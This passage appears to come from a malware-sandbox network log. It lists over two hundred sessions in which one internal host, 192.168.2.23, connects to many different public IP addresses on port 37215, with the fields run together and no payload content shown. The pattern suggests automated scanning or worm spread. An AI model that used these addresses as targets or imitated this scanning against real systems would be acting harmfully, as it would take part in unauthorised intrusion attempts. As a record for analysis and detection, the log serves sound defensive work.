                                          10019192.168.2.2356144157.115.56.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10020192.168.2.2339450157.220.156.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10021192.168.2.2355756113.30.9.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10022192.168.2.2343162197.239.224.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10023192.168.2.2337876157.228.213.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10024192.168.2.2341818197.111.157.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10025192.168.2.235222641.113.214.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10026192.168.2.235551435.111.137.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10027192.168.2.2346120197.121.122.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10028192.168.2.233511241.76.247.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10029192.168.2.2354118197.120.235.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10030192.168.2.234663841.144.167.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10031192.168.2.234073841.92.62.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10032192.168.2.233530841.130.190.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10033192.168.2.2333890185.7.251.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10034192.168.2.2336448197.112.162.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10035192.168.2.234097441.15.163.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10036192.168.2.2340356157.161.229.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10037192.168.2.234255841.124.135.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10038192.168.2.2344120157.251.28.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10039192.168.2.234133041.80.111.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10040192.168.2.2359530157.32.6.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10041192.168.2.2339308197.202.205.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10042192.168.2.2353818193.51.155.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10043192.168.2.2353568197.170.146.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10044192.168.2.235549890.131.70.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10045192.168.2.23376964.106.197.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10046192.168.2.2349376197.150.40.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10047192.168.2.233481041.168.170.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10048192.168.2.2343946197.250.167.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10049192.168.2.233452841.240.244.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10050192.168.2.2357964157.77.245.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10051192.168.2.233459241.105.75.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10052192.168.2.2348814197.136.118.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10053192.168.2.235825841.251.34.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10054192.168.2.2340214141.200.209.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10055192.168.2.235470241.64.184.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10056192.168.2.2339966157.206.174.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10057192.168.2.2360282197.221.195.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10058192.168.2.2352588157.19.171.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10059192.168.2.2349128157.112.247.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10060192.168.2.234718641.43.113.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10061192.168.2.2334506157.160.8.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10062192.168.2.234174841.25.106.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10063192.168.2.2332918118.148.202.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10064192.168.2.233977041.180.74.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10065192.168.2.2350756157.159.144.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10066192.168.2.2348558157.202.225.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10067192.168.2.2360358197.235.252.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10068192.168.2.234740841.158.152.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10069192.168.2.235701441.50.155.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10070192.168.2.236060268.169.155.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10071192.168.2.2340896138.255.40.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10072192.168.2.235132841.18.181.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10073192.168.2.2347294197.106.7.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10074192.168.2.2333516157.239.225.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10075192.168.2.233848473.155.221.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10076192.168.2.2340362197.188.179.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10077192.168.2.2340558106.49.131.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10078192.168.2.2357258197.194.235.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10079192.168.2.2339420197.114.248.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10080192.168.2.234720636.175.177.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10081192.168.2.2359550157.36.154.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10082192.168.2.2358012157.47.118.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10083192.168.2.234586641.53.61.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10084192.168.2.2344788157.38.82.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10085192.168.2.2351922157.62.222.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10086192.168.2.2360608157.56.153.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10087192.168.2.2336376205.227.184.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10088192.168.2.233885441.234.12.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10089192.168.2.2333172157.230.227.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10090192.168.2.233637086.214.100.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10091192.168.2.234081441.123.114.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10092192.168.2.2357962157.126.204.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10093192.168.2.233408041.133.60.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10094192.168.2.2348868157.215.89.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10095192.168.2.2337816197.141.41.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10096192.168.2.235793641.3.219.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10097192.168.2.2341612197.170.243.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10098192.168.2.234455272.184.57.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10099192.168.2.235890041.255.151.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10100192.168.2.234632641.234.186.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10101192.168.2.2342334197.105.19.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10102192.168.2.2343646157.69.23.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10103192.168.2.2344110133.191.29.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10104192.168.2.2332934157.105.202.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10105192.168.2.2337372197.177.230.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10106192.168.2.234961641.69.50.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10107192.168.2.235351220.10.105.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10108192.168.2.2339712132.229.153.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10109192.168.2.2356608157.66.248.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10110192.168.2.234596441.217.120.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10111192.168.2.2340008197.133.215.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10112192.168.2.235482887.103.165.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10113192.168.2.2339450157.237.16.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10114192.168.2.235682641.154.147.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10115192.168.2.234656641.93.57.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10116192.168.2.2342972145.56.6.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10117192.168.2.233709067.58.205.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10118192.168.2.2352476197.158.222.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10119192.168.2.2344948197.149.17.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10120192.168.2.2357908157.208.38.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10121192.168.2.2356016197.196.114.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10122192.168.2.2343570197.212.178.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10123192.168.2.234166824.240.73.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10124192.168.2.235337241.106.246.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10125192.168.2.2352594178.226.195.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10126192.168.2.2360138157.193.24.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10127192.168.2.2339720197.137.75.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10128192.168.2.2348914197.14.233.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10129192.168.2.2356006157.157.74.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10130192.168.2.236055241.34.46.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10131192.168.2.2341004157.28.67.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10132192.168.2.2341418157.101.182.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10133192.168.2.233899441.223.203.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10134192.168.2.235804438.126.121.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10135192.168.2.2340642157.147.236.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10136192.168.2.235147018.131.248.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10137192.168.2.2347678199.101.15.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10138192.168.2.233364241.245.12.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10139192.168.2.2336318197.76.76.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10140192.168.2.2336214197.98.104.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10141192.168.2.2336304157.132.62.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10142192.168.2.2333392190.85.250.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10143192.168.2.2334326157.141.152.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10144192.168.2.2343098102.149.72.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10145192.168.2.2337566197.59.179.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10146192.168.2.234447841.140.163.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10147192.168.2.234564641.170.122.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10148192.168.2.234873841.105.66.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10149192.168.2.233527641.149.70.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10150192.168.2.2356424197.134.60.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10151192.168.2.2351336157.60.175.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10152192.168.2.235505081.6.223.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10153192.168.2.235078441.211.216.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10154192.168.2.236087841.168.121.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10155192.168.2.2350562130.194.26.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10156192.168.2.2347358157.213.78.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10157192.168.2.2349854209.87.46.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10158192.168.2.2340374202.21.203.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10159192.168.2.2353786131.227.145.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10160192.168.2.2356330197.73.250.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10161192.168.2.233557465.41.139.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10162192.168.2.2340628197.92.197.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10163192.168.2.233786641.217.186.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10164192.168.2.2352180218.213.234.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10165192.168.2.2338382157.135.169.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10166192.168.2.2350466157.105.112.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10167192.168.2.235126441.215.235.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10168192.168.2.233797241.121.212.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10169192.168.2.233871281.142.8.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10170192.168.2.2334720157.107.142.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10171192.168.2.233426041.24.251.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10172192.168.2.2338750197.117.97.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10173192.168.2.234416441.63.99.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10174192.168.2.2350054157.85.159.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10175192.168.2.2336050157.136.16.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10176192.168.2.2360708157.236.35.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10177192.168.2.233899841.76.86.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10178192.168.2.2335164157.204.253.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10179192.168.2.2339276197.33.226.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10180192.168.2.233867641.23.121.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10181192.168.2.2334014157.53.150.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10182192.168.2.2357128211.242.126.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10183192.168.2.236041447.74.75.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10184192.168.2.2349126172.50.16.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10185192.168.2.234652041.162.47.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10186192.168.2.2336590197.52.31.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10187192.168.2.2349706197.135.104.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10188192.168.2.2357016149.45.44.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10189192.168.2.2351568197.197.167.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10190192.168.2.2343348197.236.122.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10191192.168.2.2344868157.141.162.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10192192.168.2.2352590122.247.132.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10193192.168.2.2340626157.226.36.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10194192.168.2.2335694105.174.32.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10195192.168.2.2345010197.128.145.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10196192.168.2.2340528157.210.85.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10197192.168.2.2340200197.238.182.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10198192.168.2.2351202197.49.176.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10199192.168.2.234230841.208.134.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10200192.168.2.2357190197.250.132.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10201192.168.2.2339894197.229.126.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10202192.168.2.2340420197.50.199.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10203192.168.2.2350172197.209.245.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10204192.168.2.235121241.61.15.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10205192.168.2.2352388207.0.188.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10206192.168.2.233615241.4.193.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10207192.168.2.2345860188.134.171.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10208192.168.2.233568697.223.118.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10209192.168.2.235203441.110.191.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10210192.168.2.234115241.194.108.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10211192.168.2.2357348121.163.237.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10212192.168.2.2353394157.25.75.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10213192.168.2.2358356157.57.236.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10214192.168.2.2347204106.186.66.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10215192.168.2.234619441.104.236.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10216192.168.2.2349300197.45.218.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10217192.168.2.233732641.223.193.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10218192.168.2.2332892197.254.84.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10219192.168.2.236046441.176.80.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10220192.168.2.233795241.52.115.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10221192.168.2.236030841.253.91.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10222192.168.2.2342654165.184.52.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10223192.168.2.235216242.171.34.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10224192.168.2.2342266197.254.169.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10225192.168.2.234331441.214.188.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10226192.168.2.2334676143.108.69.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10227192.168.2.2335290157.181.133.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10228192.168.2.2354160157.107.210.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10229192.168.2.2342012197.160.68.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10230192.168.2.2342414197.139.42.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10231192.168.2.233605237.108.210.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10232192.168.2.2338854157.183.86.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10233192.168.2.235641036.133.33.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10234192.168.2.2354926170.226.152.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10235192.168.2.2352338157.214.96.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10236192.168.2.233797042.239.29.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10237192.168.2.2347932197.60.189.18837215
